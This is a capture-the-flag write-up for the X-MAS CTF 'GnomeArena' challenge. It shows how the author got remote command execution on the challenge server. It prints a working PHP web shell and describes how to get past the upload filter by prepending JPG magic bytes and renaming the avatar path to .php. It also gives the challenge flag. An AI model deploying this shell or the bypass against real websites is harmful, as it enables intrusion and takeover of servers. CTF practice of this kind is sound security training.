X-MAS CTF: GnomeArena: Rock Paper Scissors
Post
Cancel

# X-MAS CTF: GnomeArena: Rock Paper Scissors

The challenge description is:

So going to the page we find out that there is a game with a settings page on the top right corner which looks way more interesting for us than the game itself.

So I tried to modify a few parameters and see what changes were in the page. I noticed that the profile picture is stored under avatar/name and that whenever I change the name the path of the picture changes as well.

With that in mind, I tried to upload a simple PHP shell to execute commands:

1 <?php if(isset($_REQUEST['cmd'])){ echo "<pre>";$cmd = ($_REQUEST['cmd']); system($cmd); echo "</pre>"; die; }?> 

However, I got a warning saying that the file needed to be an image. That’s when I had an inspiration that helped me solve the challenge.

1. Rename the shell.php to shell.jpg and append at the start of the file JPG’s magic number: FF D8 FF. That way, the shell will be recognised as an image but it will be executed later.
2. Change the name to something.php, in this case I used root2u.php.

Then, I just needed to access avatar/root2u.php?cmd= and use any linux command I liked!

Now, It’s just a matter of time before we find the location of the flag.

And we get our flag: X-MAS{Ev3ry0ne_m0ve_aw4y_th3_h4ck3r_gn0m3_1s_1n_t0wn}.